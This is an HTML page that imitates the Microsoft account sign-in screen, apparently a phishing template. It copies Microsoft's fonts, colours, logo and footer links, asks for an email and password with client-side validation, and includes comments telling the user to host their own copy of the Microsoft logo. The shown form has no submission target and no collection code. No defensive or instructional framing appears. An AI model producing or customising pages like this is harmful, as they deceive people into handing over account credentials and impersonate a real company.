<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <link href="favicon.ico" rel="icon"/>
    <title>Sign in to your Microsoft account</title>
    <style>
        * {
            padding: 0;
            margin: 0;
            box-sizing: border-box;
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
        }

        html, body {
            background-color: #e2e5d3;
            color: #1b1b1b;
        }

        .auth-wrapper {
            max-width: 440px;
            width: calc(100% - 40px);
            padding: 44px;
            margin: auto; /* Adjust where the login box is */ 
            margin-top: 15%;
            background-color: #fff;
            box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            min-width: 320px;
        }

        .input {
            padding: 4px 8px;
            border-style: solid;
            border-width: 2px;
            border-color: rgba(0, 0, 0, .4);
            background-color: rgba(255, 255, 255, .4);
            height: 32px;
            padding: 6px 10px;
            padding-left: 10px;
            border-width: 1px;
            border-top-width: 1px;
            border-right-width: 1px;
            border-left-width: 1px;
            border-color: #666;
            border-color: rgba(0, 0, 0, .6);
            height: 36px;
            outline: none;
            border-radius: 0;
            background-color: transparent;
            border-top-width: 0;
            border-left-width: 0;
            border-right-width: 0;
            padding-left: 0;
            width: calc(100% - 20px);
        }

        .input:hover {
            border-color: #323232;
            border-color: rgba(0, 0, 0, .8);
        }

        .input::placeholder {
            font-size: 15px;
        }

        .btn {
            margin: 0 0 0 auto;
            display: block;
            background-color: #0067b8;
            color: #fff;
            border: 2px solid #0067b8;
            padding: 5px 30px;
            font-size: 15px;
            cursor: pointer;
        }

        .btn:hover {
            background-color: #005da6;
        }

        .has-icon {
            display: flex;
            gap: 5px;
            align-items: center;
        }

        .mb-0 {
            margin-bottom: 0;
        }

        .has-icon .icon {
            display: inline-flex;
        }

        .mb-16 {
            margin-bottom: 16px;
        }

        .footer {
            position: absolute;
            left: 0;
            bottom: 0;
            width: 100%;
            overflow: visible;
            z-index: 99;
            clear: both;
            min-height: 28px;
            display: flex;
            flex-direction: row;
            gap: 10px;
            justify-content: end;
        }

        .footer a, .footer span {
            color: #000;
            font-size: 12px;
            line-height: 28px;
            margin-left: 8px;
            margin-right: 8px;
            text-decoration: none;
        }

        .footer span {
            font-size: 20px;
            line-height: 20px;
        }

        .footer a:hover {
            text-decoration: underline;
        }
        
        .link {
            text-decoration: none; 
            color: #0067b8; 
            font-size: 13px;
        }

        .title {
            font-weight: 600; /* This is where you adjust the font weight (boldness) */
        }
    </style>
</head>
<body>
<section id="section_uname">
    <div class="auth-wrapper">
        <img alt="Microsoft" src="https://i.ibb.co/pn93Syb/logo.png"/> <!-- If this doesn't work or show a picture, upload Microsoft logo yourself and input image URL -->
        <h2 class="title mb-16 mt-16" style="margin-top: 10px;">Sign in</h2>
        <form action="" method="post">
            <div class="mb-16">
                <p class="error" id="error_uname"> </p>
                <input class="input" id="inp_uname" placeholder="Email, phone, or Skype" type="text"/>
            </div>
            <div class="mb-16">
                <p class="error" id="error_pwd"> </p>
                <input class="input" id="inp_pwd" placeholder="Password" type="password"/>
            </div>
            
            <div>
                <p class="mb-16"><a class="link fs-13" href="#">Forgot password?</a></p>
                <p class="mb-16"><a class="link fs-13" href="#">Other ways to sign in</a></p>
            </div>
            
            <div><button class="btn" id="btn_sig">Sign in</button></div>
        </form>
    </div>
</section>

<footer class="footer"><a href="#">Terms of use</a> <a href="#">Privacy &amp; cookies</a> <span>. . .</span></footer>

<script>
    const unameInp = document.getElementById('inp_uname');
    const pwdInp = document.getElementById('inp_pwd');

    const sig = document.getElementById('btn_sig');

    
    let unameVal = pwdVal = false;

    function validate() {
        function unameValAction(type) {
            if (!type) {
                document.getElementById('error_uname').innerText = "Enter a valid email address, phone number, or Skype name.";
                unameInp.classList.add('error-inp');
                unameVal = false;
            } else {
                document.getElementById('error_uname').innerText = "";
                unameInp.classList.remove('error-inp')
                unameVal = true;
            }
        }

        function pwdValAction(type) {
            if (!type) {
                document.getElementById('error_pwd').innerText = "Please enter the password for your Microsoft account.";
                pwdInp.classList.add('error-inp')
                pwdVal = false;
            } else {
                document.getElementById('error_pwd').innerText = "";
                pwdInp.classList.remove('error-inp')
                pwdVal = true;
            }
        }

        if (unameInp.value.trim() === "") {
            unameValAction(false);
        } else {
            unameValAction(true);
        }

        if (pwdInp.value.trim() === "") {
            pwdValAction(false);
        } else {
            pwdValAction(true);
        }
    }
</script>



</body></html>
